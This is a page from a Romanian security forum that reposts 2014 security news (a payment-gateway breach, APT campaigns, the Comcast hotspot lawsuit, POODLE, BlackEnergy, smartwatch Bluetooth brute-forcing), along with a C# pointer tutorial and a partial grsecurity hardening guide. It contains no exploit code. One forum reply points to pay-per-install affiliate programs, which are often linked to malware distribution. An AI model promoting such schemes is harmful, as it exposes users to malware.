CHARGE Anywhere, a New Jersey-based developer of payment gateway and mobile payment applications, on Tuesday disclosed that it had been breached and that hackers had access to transactions leaving its network, perhaps going back as far as 2009. Most of the traffic was encrypted, the company said in its disclosure statement, but some plain text data was stolen between Aug. 17 and Sept. 22. The number of records accessed or stolen was not disclosed. “The investigation revealed that an unauthorized person initially gained access to the network and installed sophisticated malware that was then used to create the ability to capture segments of outbound network traffic,” CHARGE Anywhere’s statement read. “Much of the outbound traffic was encrypted. However, the format and method of connection for certain outbound messages enabled the unauthorized person to capture and ultimately then gain access to plain text payment card transaction authorization requests.” CHARGE Anywhere said the malware has been removed from its network since it was discovered Sept. 22. Evidence of network capture exists, they said, for traffic segments between Aug. 17 and Sept.22, but it’s likely this capability was available to the hackers dating back to Nov. 5, 2009. The payment authorization requests, CHARGE Anywhere said, may include cardholder name, account number, expiration date and verification code. “CHARGE Anywhere commenced the investigation that uncovered and shut down the attack after being asked to investigate fraudulent charges that appeared on cards that had been legitimately used at certain merchants,” the company said. “The malware was immediately removed and we engaged a leading computer security firm to investigate how the malware was used and work with us to continue to enhance our network security measures.” The company’s payment gateways send traffic from point-of-sale terminals and systems to payment processors. Merchant and processor systems, however, were not breached, the company said, adding that it is continuing to route merchant transactions. Merchant and processor systems, however, were not breached, the company said, adding that it is continuing to route merchant transactions. “We have also been working with the credit card companies and processors to provide them with a list of merchants and the account numbers for cards used during the period at issue so that the banks that issued those cards can be alerted,” CHARGE Anywhere said. “When banks receive these alerts, they can conduct heightened monitoring of transactions to detect and prevent unauthorized charges.” The company also set up a page where consumers can search for merchants by name and location to determine if they were affected by the breach. Retailer security has been headline news since the Target breach a year ago. Security experts and government entities have issued warnings about malware targeting point-of-sale systems and the need to encrypt data. Small retailers and hospitality providers are particularly under the gun because they’re under-resourced and rely on vendors for security. Even large retailers, such as Target, have suffered. Last week, a Minnesota District Court judge ruled Target negligent in its breach, allowing a litany of class-action lawsuits from consumers and financial organizations to proceed. Source
-
Red October Attackers Return With CloudAtlas APT Campaign
Aerosol posted a topic in Stiri securitate
The attackers behind the Red October APT campaign that was exposed nearly two years ago have resurfaced with a new campaign that is targeting some of the same victims and using similarly constructed tools and spear phishing emails. Red October emerged in January 2013 and researchers found that the attackers were targeting diplomats in some Eastern European countries, government agencies and research organizations with malware that could steal data from desktops, mobile devices and FTP servers. The attackers had a wide variety of tools at their disposal and used unique victim IDs and had exploits for a number of vulnerabilities. The Red October attacks began with highly targeted spear phishing emails, some of which advertised a diplomatic car for sale. The new CloudAtlas campaign, disclosed Wednesday by researchers at Kaspersky Lab, also uses that same spear phishing lure and as targeted some of the same victims hit by Red October. Researchers believe the same group may be behind both campaigns, based on similarities in tactics, tools and targets. “In August 2014, some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware. We did a quick analysis of the malware and it immediately stood out because of certain unusual things that are not very common in the APT world,” researchers at Kaspersky said in an analysis of the attack. “At least one of them immediately reminded us of RedOctober, which used a very similarly named spearphish: “Diplomatic Car for Sale.doc”. As we started digging into the operation, more details emerged which supported this theory. Perhaps the most unusual fact was that the Microsoft Office exploit didn’t directly write a Windows PE backdoor on disk. Instead, it writes an encrypted Visual Basic Script and runs it.” Both Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines. Both Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines. In one case, a machine was attacked only twice in the last two years, once by Red October and once by CloudAtlas. Both campaigns also hit victims in the same countries: Russia, Belarus, Kazakhstan and India. The two campaigns also use similar malware tools. “Both Cloud Atlas and RedOctober malware implants rely on a similar construct, with a loader and the final payload that is stored encrypted and compressed in an external file. There are some important differences though, especially in the encryption algorithms used – RC4 in RedOctober vs AES in Cloud Atlas,” Kaspersky researchers said. “The usage of the compression algorithms in Cloud Atlas and RedOctober is another interesting similarity. Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the ‘scheduler’ plugin uses it to decompress executable payloads from the C&C.” The C2 infrastructure for the CloudAtlas campaign is somewhat unusual. The attackers are using accounts at Swedish cloud provider CloudMe to communicate with compromised machines. “The attackers upload data to the account, which is downloaded by the implant, decrypted and interpreted. In turn, the malware uploads the replies back to the server via the same mechanism,” the researchers said. Officials at CloudMe said on Twitter that they are working to delete any CloudAtlas C2 accounts. “Yes, we are permanently deleting all accounts that we can identify as involved in the #inception #cloudatlas #apt #surveillance,” the company said. Researchers at Blue Coat have also looked at the new campaign, which they’ve named Inception, and found that the attackers have created tools to compromise a variety of mobile platforms, as well. “The framework continues to evolve. Blue Coat Lab researchers have recently found that the attackers have also created malware for Android, BlackBerry and iOS devices to gather information from victims, as well as seemingly planned MMS phishing campaigns to mobile devices of targeted individuals. To date, Blue Coat has observed over 60 mobile providers such as China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but the real number is likely far higher,” Snorre Fagerland and Waylon Grange from Blue Coat Lab wrote. Source -
Cable and Internet service conglomerate Comcast is facing a class-action lawsuit stemming from its use of customer routers as personal home Wi-Fi networks as well as public-facing wireless hotspots available for other Comcast-Xfinity customers. Toyer Grear and Jocelyn Harris, themselves and on behalf of the rest of the class, allege that Comcast is violating the Computer Fraud and Abuse Act, California’s Comprehensive Computer Data Access and Fraud Act, and the Business Professions code. The Class action was filed in a San Francisco court on Dec. 4. In order to offer services similar to those of its competitors – namely companies such as AT&T and Verizon with cellular infrastructure that enabled them deploy public facing Wi-Fi hotspots – Comcast decided that it could use its network of millions of customer routers to build a similar network of Wi-Fi hotspots without needing cell towers. So in recent years, Comcast began leasing dual-band routers capable of broadcasting separate wireless networks to its customers: one for home networks and a second, public-facing network available for anyone with Comcast-Xfinity login credentials. According to the suit, Comcast aims to have 8 million such hotspots available by the end of 2014. In fact, you live in an area dominated by Comcast and you look at the wireless networks in range of your computer’s receiver, you will almost certainly notice a wireless network named “xfinitywifi.” Problematically, the class alleges that Comcast does not obtain proper prior consent before deploying customer equipment for public use, though Comcast contends that it informed affected customers well in advance via emails and letters. “Indeed, without obtaining its customers’ authorization for this additional use of their equipment and resources, over which the customer has no control, Comcast has externalized the costs of its national Wi-Fi network onto its customers,” the complaint alleges. “The new wireless routers the company issues consume vastly more electricity in order to broadcast the second, public Xfinity Wi-Fi hotspot, which cost is born by the residential customer.” Through this practice, Comcast is also accused of degrading home Internet performance and subjecting its customers to potential security risks. Comcast has a list of compatible routers on its website. That list makes note of the default router access credentials for each model, though it wouldn’t take much guess-work considering that the usernames are either blank or “admin” and the passwords are all either “password” or “admin.” Users have the capacity to change these passwords, but most do not. Some routers come with install wizards that automatically change the router admin access password to the customer’s chosen wireless network password, but it’s unclear if the Comcast routers contain these drivers or if customers use them. There’s an authentication bypass vulnerability affecting the Netgear WNR1000 router that Comcast issues to customers. The second router listed by Comcast is Netgear’s WNR3500, which got hacked at the DEFCON router hacking contest in August. Secunia last year reported on a cross-site forgery bug in Linksys WRT310N, which is also on Comcast’s list. More than a cursory search through Google would very likely turn up any number of other issues. Users can update the firmware for their routers assuming the manufacturer has provided a security updates, but most routers are low-memory devices, so updating them requires that the user find the proper firmware installation and upload it manually to the router. Such updates are not announced to users in any meaningful way, nor are instructions on where to download the updated firmware and how to install it. In reality, users simply do not install router updates. There is also the question of whether a particular vulnerability in one of these routers could be exploited on the public-facing Wi-Fi hotspot in order to gain access — without authentication — to the personal, home network. In November, Threatpost covered a bug in a Belkin router through which an attacker, after accessing the router’s guest network, could leap-frog onto the associated private network without authentication. For it’s part, Comcast is defending its decision. “We disagree with the allegations in this lawsuit and believe our Xfinity WiFi home hotspot program provides real benefits to our customers,” Comcast said in a statement. “We provide information to our customers about the service and how they can easily turn off the public WiFi hotspot if they wish http://wifi.comcast.com/faqs.html.” Comcast is also downplaying claims that the partitioning routers for public and private use would affect personal Internet speeds. “For your in-home WiFi network, we have provisioned the XFINITY WiFi feature to support robust usage, and therefore anticipate minimal impact to the in-home WiFi network,” the company claims. “As with any shared medium, there can be some impact as more devices share the network. For data usage, the activities of visiting users are associated with the visitors’ accounts and therefore do not impact the homeowner.” The company also attempted to push back security concerns by explaining that the log in process is totally encrypted. However, in all the ISP’s talking points, they never address the impact of new and existing routers on this new practice. Source
-
esterday’s Internet Explorer security bulletin, in addition to patching 14 vulnerabilities, also affords Windows admins the ability to disable SSL 3.0 in IE 11 for Protected Mode sites. Doing so eliminates exposure to POODLE SSL attacks. Microsoft said the change is off by default for now, but will turn it on by default in IE on Feb. 10, 2015. This is Microsoft’s first step toward disabling SSL 3.0 by default in all of its online services. Other providers such as Google have already moved in this direction. Chrome 39, released in late November, also removed support for the fallback to SSL 3.0. The move from Microsoft comes two days after the latest news in the POODLE saga that revealed some implementations of TLS are also vulnerable. TLS is the replacement for SSL used for secure communication in many organizations. POODLE attacks enable hackers to decrypt traffic over a supposedly secure connection. The weakness in SSL 3.0 occurs when attempts to negotiate a secure connection fail, webservers sometimes will fall back to an older protocol in order to enable the connection. SSL 3.0 is vulnerable to padding oracle attacks against the webserver putting supposedly encrypted traffic at risk. “By interfering with the connection between the target client and server, a man-in-the-middle can force a downgrade from TLS 1.0 or newer, more secure protocols, to the SSL 3.0 protocol,” Microsoft explained in its announcement on Tuesday. “The vast majority of the time, a fallback from TLS 1.0 to SSL 3.0 is the result of an innocent error, but this is indistinguishable from a man-in-the-middle attack.” With yesterday’s IE cumulative update, users can opt in to block SSL 3.0 fallback in the most current version of the browser. “Enterprise customers are able to configure this behavior via Group Policy, and this behavior will also be configurable via registry or using an easy, one-click Fix it solution,” Microsoft said, adding that configuration details are available in Knowledge Base article 3013210. Google researcher Adam Langley exposed the TLS issue this week, noting that F5 security appliances, as well as some from A10 Networks were vulnerable. F5 has already patched its boxes, while A10 was expected to patch yesterday. “This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad,” Langley said. Yesterday’s IE bulletin, MS14-080, patched 14 memory corruption and ASLR bypass vulnerabilities in versions going back to IE 6 on the client side. The issue was less severe in Windows servers, Microsoft said. Source
-
Black Energy Malware May Be Exploiting Patched WinCC Flaw
Aerosol posted a topic in Stiri securitate
Experts at ICS-CERT say that the BlackEnergy malware that has been seen infecting human-machine interface systems may be exploiting a recently patched vulnerability in the Siemens SIMATIC WinCC software in order to compromise some systems. The ICS-CERT originally issued an alert about the attacks by the venerable BlackEnergy malware in October, and at the time the group warned that the malware was targeting three specific HMI products: GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. “At this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim systems’ control processes. ICS-CERT has not been able to verify if the intruders expanded access beyond the compromised HMI into the remainder of the underlying control system. However, typical malware deployments have included modules that search out any network-connected file shares and removable media for additional lateral movement within the affected environment. The malware is highly modular and not all functionality is deployed to all victims,” the alert said. At the time of the original alert, ICS-CERT wasn’t sure how WinCC systems were being infected, but it now appears that BlackEnergy may be targeting a vulnerability that was patched in November by Siemens. “While ICS-CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy, there are indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have been exploited by the BlackEnergy malware.g ICS-CERT strongly encourages users of WinCC, TIA Portal, and PCS7 to update their software to the most recent version as soon as possible,” the updated alert says. Siemens patched two vulnerabilities in WinCC on Nov. 11, including one that could allow remote code execution. Source -
Allowing the warrant to move forward, Microsoft argues, "would violate international law and treaties, and reduce the privacy protection of everyone on the planet." Microsoft is preparing to fight a U.S. government search warrant that seeks its customer emails stored abroad. Microsoft's chief counsel Brad Smith and other tech attorneys will explain why the company should not have to comply with a warrant for data hosted at a facility in Dublin, Ireland, in a panel moderated by ABC's Charlie Gibson in New York next Monday. Microsoft (MSFT, Tech30) has already argued in a June court filing that prosecutors had no right to execute the warrant because it is outside the country's jurisdiction. The identity of the customers that the government is after isn't clear, though the case relates to alleged drug trafficking and money laundering. Allowing the warrant to move forward, Microsoft argued, "would violate international law and treaties, and reduce the privacy protection of everyone on the planet." Verizon (VZ, Tech30) has also weighed in, submitting a brief in support of Microsoft's argument. The case raises questions about what role jurisdiction and physical borders play when it comes to digital information. The result of the lawsuit could have far-reaching implications for how tech companies deal with law enforcement. Related: Microsoft begins accepting Bitcoin Tech companies store customer information at data centers all around the world. Microsoft says its email users' information "resides on a specific server in the Dublin datacenter" and "does not exist in any form inside the United States." Prosecutors contend that the distinction isn't meaningful because electronic data is "readily available" for access by Microsoft employees in the United States. "Imposing the limitations urged by Microsoft would lead to absurd results and severely undercut criminal investigations conducted by U.S. law enforcement," Manhattan U.S. Attorney Preet Bharara wrote in a court filing. Big tech companies receive thousands of requests for customer data each year from intelligence and traditional law enforcement agencies. Those requests have been under scrutiny in recent months following leaks from former NSA contractor Edward Snowden who revealed vast data grabs encompassing millions of people in the U.S. and foreign countries with no suspected links to terrorism. "Over the course of the past year, Microsoft and other U.S. technology companies have faced growing mistrust and concern about their ability to protect the privacy of personal information located outside the United States," Microsoft said in its June filing. Related: Microsoft takes giant loss on Nook This case is different, however, as it relates to a narrow criminal investigation in which a judge has already approved a warrant. Companies like Microsoft, Facebook (FB, Tech30) and Google (GOOG) regularly publish "transparency reports" detailing the amount and nature of data requests they receive from the government, though they can't provide information on individual cases. Microsoft says it doesn't consider these requests unless law enforcement officials have valid subpoenas, warrants or court orders. Source
-
E destul de ok, se misca si arata bine iar versiunea pentru mobile e si ea ok, felicitari si bafta cu site-ul.
-
We are living in an era of smart devices that we sync with our smartphones and make our lives very simple and easy, but these smart devices that inter-operates with our phones could leave our important and personal data wide open to hackers and cybercriminals. Security researchers have demonstrated that the data sent between a Smartwatch and an Android smartphone is not too secure and could be a subject to brute force hacks by attackers to intercept and decode users' data, including everything from text messages to Google Hangout chats and Facebook conversations. Well this happens because the bluetooth communication between most Smartwatches and Android devices rely on a six-digit PIN code in order to transfer information between them in a secure manner. Six-digit Pin means approx one million possible keys, which can be easily brute-forced by attackers into exposing entire conversations in plain text. Researchers from the Romania-based security firm Bitdefender carried out a proof-of-concept hack against a Samsung Gear Live smartwatch and a paired Google Nexus 4 handset running Android L Preview. Only by using sniffing tools available at that moment, the researchers found that the PIN obfuscating the Bluetooth connection between both devices was easily brute forced by them. Brute force attack is where a nearby hacker attempts every possible combination until finding the correct one. Once found the right match, they were able to monitor the information transferring between the smartwatch and the smartphone. VIDEO DEMONSTRATION You can watch the Proof-of-Concept video below, ran on a Samsung Gear Live smartwatch and a paired Google Nexus 4 device running Android L PreviewPreview. The researchers explained that their findings were "pretty consistent with [their] expectations" and without a great deal of effort, an encrypted communications between wearable technology and smartphones could be cracked and left open to prying eyes. This new discovery is important particularly for those who are concerned about their personal data, and considering the increase in the market of smartwatches and wearable devices at the moment, the discovery will definitely made you to think before using one. HOW TO PROTECT YOURSELF FROM SUCH ATTACKS To protect yourself to be a victim of such attacks, use Near Field Communication (NFC) to safely transmit a PIN code to compatible smartwatches during pairing, but that would likely increase the cost and complexity of the devices. In addition, "using passphrases is also tedious as it would involve manually typing a possibly randomly generated string onto the wearable smartwatch," the report said. Another option is to use original equipment manufacturers (OEMs) by Google as an alternative to make data transfers between either device more secure. "Or we could supersede the entire Bluetooth encryption between Android device and smartwatch and use a secondary layer of encryption at the application level," the report offered. There are almost certainly other potential fixes available. Source
-
SECURITY RESEARCHERS have uncovered a sophisticated cyber espionage tool being used to launch "highly targeted attacks" designed to extract confidential information. Security firm Blue Coat Labs claims to have identified the previously undocumented 'Inception' attack framework. The malware's design has "many layers", and so is named Inception after the Hollywood blockbuster about a thief who entered people's dreams to steal secrets. Based on iteration data, Blue Coat has assumed that somewhere between 100 and 200 targets have been affected. The firm found that, in all cases, the malware has been embedded in Rich Text Format (RTF) files. Exploitation of vulnerabilities in these file formats is used to gain remote access to victims' computers. These files are then delivered via phishing emails with exploited Word documents attached. The malware's targets include individuals in strategic positions, such as oil, finance and engineering executives, military officers, embassy personnel and government officials. The Inception attacks began by focusing on targets primarily located in Russia or related to Russian interests, but have since spread to targets in other locations around the world. The preferred malware delivery method is via phishing emails containing trojanised documents. The identity of the attackers is hidden via command and control traffic on the Windows platform, performed indirectly via a Swedish cloud service provider CloudMe using the WebDAV protocol. This may also bypass many current detection mechanisms, said Blue Coat. "The attackers have added another layer of indirection to mask their identity by leveraging a proxy network composed of routers, most of which are based in South Korea, for their command and control communication," the firm said in its blog post. "It is believed that the attackers were able to compromise these devices based on poor configurations or default credentials." Senior Principal Security Researcher at Blue Coat, Snorre Fagerland, told The INQUIRER that the entire setup is meticulously designed for automation and operational security. "When the attackers want to send a phishing mail they use one of their hacked routers. The proxy port on the router cannot be connected to directly, it must first be opened. Attackers do that by connecting to a different port, authenticate by a unique password for this router, and ask the router to open its proxy door," he explained. Fagerland said this was being done in an automated fashion - where computer one unlocks the router, then seconds later computer two logs on and sends mail, and then the router is locked again. Attackers had hundreds of these hacked routers at their disposal, all configured with different passwords and different port configurations," he added. "The attackers obviously had a database of this infrastructure, and were able to script the usage of this so that different machines had to cooperate to perform the necessary actions. "The attackers also spread their actions thinly over this network of routers. When the attackers upload new content to CloudMe, they do so while iterating over their router network, so there are new IP's accessing the shares every time. Blue Coat also believes that the framework is continuing to evolve, and that the attackers have created malware for Android, BlackBerry and iOS devices to gather information from as many victims as possible. The firm observed over 60 mobile providers, including China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but said the real number could be even higher. However, though a large scale attack, general users are not to worry, as it is not dangerous to the average person. Nevertheless, if you have an important role, typically a strategically important role, the firm has warned that you would be at risk of attacks. "Once compromised, the attack is hard to notice as most of it only exists in memory," said Fagerland. "The WebDAV protocol traffic to CloudMe also looks unremarkable from the point of view of many Intrusion Detection Systems." There is no quick fix to protect yourself from Inception. Blue Coat advises users can best protect themselves with common sense. For example, if you receive a mail or any other contact request that seems in the least out of the ordinary - let your security people check it out first. "Targeted attacks are usually poorly covered by your standard blocking product. So, you'll want to cover as many bases and angles as possible, with toolsets that allow you to tailor preventive measures to your own network and provide visibility and intelligence, explained Fagerland. "But the best protection is in the head." Source
-
Mobile payments biz Charge Anywhere has admitted a hacker may have been snooping on its systems for FIVE years. While probing an internal malware infection, Charge Anywhere discovered someone has been able to eavesdrop on its network traffic since November 2009. That investigation revealed all sorts of sensitive data had been swiped from the global company's compromised computers, included customer names, card numbers, expiration dates and verification codes. Hackers succeeded in defeating Charge Anywhere's encryption before extracting data, as the outfit's statement explains: Charge Anywhere commenced the investigation that uncovered and shut down the attack after being asked to investigate fraudulent charges that appeared on cards that had been legitimately used at certain merchants. Charge Anywhere’s investigation found malware that had not been previously detected by any anti-virus program. The malware was immediately removed and we engaged a leading computer security firm to investigate how the malware was used and work with us to continue to enhance our network security measures. The investigation revealed that an unauthorized person initially gained access to the network and installed sophisticated malware that was then used to create the ability to capture segments of outbound network traffic. Much of the outbound traffic was encrypted. However, the format and method of connection for certain outbound messages enabled the unauthorized person to capture and ultimately then gain access to plain text payment card transaction authorization requests. Charge Anywhere, a New Jersey-headquartered biz that processes payments for mobile apps and websites, says crooks extracted the sensitive data from its computers between August 17 and September 24 this year – although someone had established the ability to sniff parts of its network traffic as far back as 2009: During the exhaustive investigation, only files containing the segments of captured network traffic from August 17, 2014 through September 24, 2014 were identified. Although we only found evidence of actual network traffic capture for this short time frame, the unauthorized person had the ability to capture network traffic as early as November 5, 2009. The firm has set up a help page allowing merchants to search an unpublished list of affected traders to find out whether or not they've been hit by the security breach. An FAQ aimed at web hawkers, which essentially advises them to keep calm and carry on as normal, can be found here [PDF]. The infiltration illustrates the importance for payment processors to fully encrypt sensitive data as it traverses their network, as cybercrime-focused investigative journalist Brian Krebs points out. Source
-
Two California residents have filed a class-action suit against Comcast in federal court for using their home's wireless router in an effort to create a nationwide network of public WiFi hotspots. The plaintiffs, Toyer Grear and his daughter, Jocelyn Harris, accused Comcast of “exploiting them for profit,” in the suit filed in U.S. District Court in San Francisco. Indeed, to compete with large cell phone providers, the company is attempting to build its Xfinity WiFi Hotspot network, a second high-speed internet channel using its customers' wireless gateway modems. That channel, separate from the one used by its customers, would be the purview of houseguests and customers who are using mobile devices while in range of one of the network. Comcast's goal is to expand the network to include eight million hotspots by year's end and to over coverage in 19 of the largest cities in the U.S. Customers lease their modems from the company, which began activating the network in the Bay Area last fall. While its customers can opt out of the second channel, Grear and Harris contend in the suit that Comcast doesn't “obtain the customer's authorization prior to engaging in this use of the customer's equipment and Internet service for public, non-household use.” And, they contended, customers must bear “the costs of its national WiFi network,” citing a text by Speedify, a Philadelphia-based company, that tested the Internet channel and found that it would put “tens of millions of dollars per month of the electricity bills needed to run their nationwide public Wi-Fi network onto consumers.” Calling home cable modems “very much ‘Plug-and-Pray' (plug it in, pray there are no issues),” Trey Ford, Global Security Strategist at Rapid7, maintained, in comments emailed to SCMagazine.com, that Internet Service Providers (ISPs) “have a poor track record of patch management” for customer premise equipment (CPE). The modems, he said, “are fraught with security issues but vendors are more concerned with making them easy to use than safe, stable and secure for the user.” The suit also said that tests showed that when the secondary channel is used heavily, customer electricity bills go up 30 to 40 percent. In addition, the set-up “subjects the customer to potential security risks” by enabling strangers to access the internet through customer routers “with the customer having no option to authorize” or control its use. As homes in the U.S. become more connected to the internet, “having a safe edge [like a cable modem] is extremely important,” Ford said. "I hope that Comcast has done a good job segmenting the 'guest' network from the subscriber's 'home network,' which is critical to the security of users who are forced to partake in this initiative.” He warned guests to the network to protect themselves because “this wireless network is completely unencrypted.” In the future, Ford expects security researchers to come down hard on Arris 852 and 862 wireless routers, examining them for security vulnerabilities and holding vendors accountable “in coordinated disclosure processes for any identified flaws.” He warned Comcast and Arris to “efficiently respond to vulnerability notifications from the research community” because the “vulnerabilities will not only bring press attention, but they will likely be referenced” in the Grear-Harris suit. The father-daughter duo also claimed they've experienced “decreased, inadequate speeds on their home Wi-Fi network,” as a result of Comcast's secondary channel. They are seeking an injunction against Comcast, forbidding the company from using home wireless routers as part of its public hotspot network as well as unspecified damages because, they said, Comcast violated the Computer Fraud and Abuse Act, California's Unfair Competition Law, and the state's Comprehensive Computer Data Access and Fraud Act, California Penal Code. Source
-
@klaryon atunci problema este de la TV.
-
In primul rand incearca sa scrii corect din punct de vedere gramatical, am sesizat o gramada de greseli la tine in post. Ai postat si in categoria gresita, daca postezi aici doar pentru ca nu ai posturi necesare NU e o scuza, hai totusi sa iti raspund. https://rstforums.com/forum/90488-ppi-up-2-5-install-dovada-plata.rst https://rstforums.com/forum/programe-de-afiliere.rst Gasesti aici cate vrei.
-
Salut si bine ai venit! Off:// @TheAnalyst ai inceput cu stangul, oamenii nu iti zic in nume de rau, ei doar iti dau sfaturi pe care ar trebui sa le iei in considerare.
-
Abstract In .NET, unsafe code really means potentially unsafe code, which is code or memory that exists outside the normal boundary. This article digs into the details of legacy C programming pointer implementation in the .NET framework. However, we will seldom need to use pointer types. Unsafe code can access unmanaged memory resources, which are outside the realm of CLR. You can access unmanaged memory with raw pointers, which are available only to unsafe code. Finally, using pointers is very risky and prone to breaches because we have to manually manage the subtle memory-related tasks. Unsafe Coding In unsafe coding, developers can access raw legacy pointers in the .NET framework environment. You can use pointer operators, such as & and *. As per the semantics of perfect programming practice, pointers should be avoided to make your code safer because they interrupt the normal operation of Garbage Collector and they point to a fixed location in unmanaged memory, while reference types point to a movable location in managed memory. But the question arises: If pointers are so dangerous, then why we are practicing unsafe coding? Why does the .NET framework allow pointers? However, using unsafe coding or pointer is sometimes necessary: for example, porting C/C++ algorithms, which rely heavily on pointers, is very beneficial. There are certain circumstances in which unsafe coding is recommended; e.g.: Calling an unmanaged function that requires a function pointer as a parameter. Unmanaged pointers no doubt improve performance and efficiency. Pointers might be easier and more convenient when working with binary and memory-resident data structure. Safe Coding Improper pointer management causes many common problems, including memory leaks, accessing invalid memory, and deleting bad pointers. Safe coding is limited to accessing the managed heap. The managed heap is managed by Garbage Collector, which is an essential component of the common language runtime. Code restricted to the managed heap is intrinsically safer than code that accesses unmanaged memory. The CLR automatically releases unused objects, conducts type verification, and performs other checks on managed memory. All this is not done automatically for unmanaged code; rather, the developer is responsible for these tasks. With managed coding, the developer can only focus on core application development instead of various administrative tasks, such as memory management. Note: Code in an unmanaged section is considered unsafe and not accessible to the CLR. Therefore, no code verification or stack tracing is performed on the unmanaged code. Pointers Implementation Managed applications that include unsafe code must be compiled with the unsafe option. The C# compiler option is simply /unsafe. In VS 2010 IDE, this option is found under solution properties in the build tab. You just have to check this option in order to compile the unsafe code that is leveraged with pointers. Note: Unsafe coding and pointer implementation require some background of C++ pointer manipulation. The unsafe Keyword The unsafe keyword specifies the location of unsafe code. When this keyword is applied to a type, all the members of that type are also considered unsafe because code inside the target is considered unsafe. When you wish to work with pointers in C#, you must specifically declare a block of unsafe code using the unsafe keyword.The following code segment depicts the overview of an unsafe code block: classProgram { staticvoid Main(string[] args) { //// pointers won't work here unsafe { // pointer manipulation (&, *) } } } We can also mark classes, methods, structure, variables, and parameters with unsafe keyword like this: publicunsafeclasstest { unsafeint x = 10; unsafevoidmyMethod(int* x) { } } The following sample does some math calculation by using a pointer and eventually produces a square root: using System; namespaceunsafePro { classProgram { staticvoid Main(string[] args) { unsafe { double x = 10; sqrt(&x); } Console.ReadKey(); } unsafestaticvoidsqrt(double* i) { Console.WriteLine("Square Root is={0}",Math.Sqrt(*i)); } } } The important point to remember here is that an unsafe method must be called from the unsafe block, otherwise compile will issue an error. The following implementation produces a compile-time error because we are calling the sqrt method from outside the unsafe block: staticvoid Main(string[] args) { unsafe { double x = 10; sqrt(&x); } int y = 5; sqrt(&y); //compile time error } We can avoid the hassle of an unsafe block by putting the unsafe keyword prefix over than main method: unsafestaticvoid Main(string[] args) { double x = 10; sqrt(&x); } Pointer Declaration and Syntax C# does not expose the pointer automatically. Exposing a pointer requires an unsafe context. Pointers normally are abstract, using references in C#. The reference abstracts a pointer to memory on the managed heap. The reference and related memory are managed by the GC. Here is the syntax for declaring a pointer: unmanagedtype* identifier; int* x,y; int *x, *y; // Wrong Syntax error Here the asterisk symbol has two purposes. The first is to declare a new pointer variable and the second is to dereference a pointer. The (->) Operator Arrow notation (->) dereference members of a pointer type found at a memory location. For instance, you can access members of a structure type using arrow notation and a pointer like this: namespaceunsafePro { publicstructxyz { publicint x; publicint y; } classProgram { staticvoid Main(string[] args) { unsafe { xyzobj = newxyz(); xyz* aa = &obj; aa->x = 200; aa->y = 400; Console.WriteLine("X is={0}", aa->x); Console.WriteLine("Y is={0}", aa->y); } Console.ReadKey(); } } } The sizeof Keyword As in C++, the sizeof keyword is used to obtain the size in bytes of a value type and it may only be used in an unsafe context. staticvoid Main(string[] args) { unsafe { Console.WriteLine("Int size is={0}", sizeof(int)); Console.WriteLine("Int16 size is={0}", sizeof(Int16)); Console.WriteLine("Int32 size is={0}", sizeof(Int32)); Console.WriteLine("Int64 size is={0}", sizeof(Int64)); } } After compiling this program, it produces the size of each integer type as follows: The stackalloc Keyword In the unsafe context, we can declare a local variable that allocates memory directly from the call stack. To do so, C# provides the stackalloc keyword, which is the C# equivalent of the allocate function of the C runtime library. unsafestaticstring data() { char* buffer = stackallocchar[5]; for (int i = 0; i < 5; i++) { buffer[i] = 'a'; } returnnewstring(buffer); } Synopsis The purpose of this article was to investigate one of the advance concept pointer implementations under the CLR context. We got a deep understanding of unsafe and safe programming and we learned how to implement pointers using C #.net. Finally, we spent some time examining small sets of pointer-related keywords such as unsafe, sizeof, and stackalloc. Source
-
Grsecurity and Xorg If we enable the “Disable privileged I/O” feature in the hardened kernel and reboot, we can’t start X server. That’s because Xorg uses privileged I/O operations. We might receive an error like this: # startx xf86EnableIOPorts: failed to set IOPL for I/O (Operation not permitted) If we would like to use Xorg, we must enable privileged I/O operations. That disables the “Disable privileged I/O” option in the hardened Linux kernel. But if we want to have privileged I/O operations disabled, and use Xorg, we can apply a patch to the xorg-server, which can be obtained here. We can apply a custom patch in Gentoo by using the epatch_user function, which applies patches found in /etc/portage/patches/<category>/<package>[-<version>[-revision>]] to the source code of the package [8]. # mkdir -p /etc/portage/patches/x11-base/xorg-server # cd /etc/portage/patches/x11-base/xorg-server # wget <a href="https://raw.github.com/N8Fear/hvb-overlay/master/x11-base/xorg-server/files/xorg-nohwaccess.patch">https://raw.github.com/N8Fear/hvb-overlay/master/x11-base/xorg-server/files/xorg-nohwaccess.patch</a> # emerge xorg-server When we activate the xorg-server, the /etc/portage/patches/x11-base/xorg-server patch will automatically be applied. Notice the line “Applying user patches from /etc/portage/patches//x11-base/xorg-server?” The next lines say that the xorg-nohwaccess.patch was applied, which was exactly the patch we downloaded from Github. >>> Emerging (1 of 1) x11-base/xorg-server-1.13.4 * xorg-server-1.13.4.tar.bz2 SHA256 SHA512 WHIRLPOOL size ;-) ... [ ok ] >>> Unpacking source... >>> Unpacking xorg-server-1.13.4.tar.bz2 to /var/tmp/portage/x11-base/xorg-server-1.13.4/work >>> Source unpacked in /var/tmp/portage/x11-base/xorg-server-1.13.4/work >>> Preparing source in /var/tmp/portage/x11-base/xorg-server-1.13.4/work/xorg-server-1.13.4 ... * Applying xorg-server-1.12-disable-acpi.patch ... * Applying xorg-server-1.13-ia64-asm.patch ... * Applying user patches from /etc/portage/patches//x11-base/xorg-server ... * xorg-nohwaccess.patch ... * Done with patching After reactivating the system, we can rebuild the kernel and enable the “Disable privileged I/O” option. Then copy the newly built kernel to the /boot partition and restart the system. Xorg should then start without problems. PaX Internals When we’ve recompiled and rebooted into the new PaX enabled kernel, it will automatically start using memory restrictions, ASLR, etc. Enabling PaX in the kernel is what we need to do to make the kernel (and therefore the system) more secure. But some executables, like Skype, won’t work with those enforcements. That’s because the security limitations are steep. If we’d like to run 